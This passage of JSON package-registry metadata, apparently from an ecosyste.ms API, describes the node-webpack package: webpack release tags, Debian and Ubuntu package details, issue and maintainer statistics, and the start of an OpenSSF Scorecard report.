61adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:26:01.360Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/node-webpack?arch=source\u0026distro=debian-10\u0026repository_url=https://packages.debian.org/buster","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"debian-10","url":"https://packages.debian.org/buster","ecosystem":"debian","default":false,"packages_count":28836,"maintainers_count":0,"namespaces_count":3,"keywords_count":903,"github":"debian","metadata":{"codename":"buster","mirror":"http://archive.debian.org/debian","funded_packages_count":659},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.156Z","updated_at":"2026-09-02T05:03:56.329Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-10/namespaces"}},{"id":13429285,"name":"node-webpack","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-07T16:31:15.436Z","latest_release_published_at":"2026-02-07T16:31:15.436Z","latest_release_number":"4.43.0-7","last_synced_at":"2026-03-07T17:33:29.476Z","created_at":"2026-02-07T16:31:15.041Z","updated_at":"2026-08-23T04:11:14.513Z","registry_url":"https://launchpad.net/ubuntu/+source/node-webpack","install_command":"apt-get install node-webpack","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"webpack","standards_version":"4.5.1","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), nodejs, dh-sequence-nodejs, node-sinon \u003c!nocheck\u003e, node-acorn (\u003e= 6.0~) \u003c!nocheck\u003e, node-ajv (\u003e= 6.1~) \u003c!nocheck\u003e, node-ajv-keywords (\u003e= 3.1~) \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-enhanced-resolve (\u003e= 4.0~) \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-loader-utils (\u003e= 1.1~) \u003c!nocheck\u003e, node-memory-fs \u003c!nocheck\u003e, node-micromatch \u003c!nocheck\u003e, node-mkdirp (\u003e= 1) \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-schema-utils (\u003e= 3.0.0~) \u003c!nocheck\u003e, node-tapable (\u003e= 1.0~) \u003c!nocheck\u003e, node-uglifyjs-webpack-plugin (\u003e= 1.3.0-4~) \u003c!nocheck\u003e, node-watchpack (\u003e= 1.4~) \u003c!nocheck\u003e, node-webpack-sources \u003c!nocheck\u003e, node-resolve-cwd \u003c!nocheck\u003e, node-interpret \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-esrecurse \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 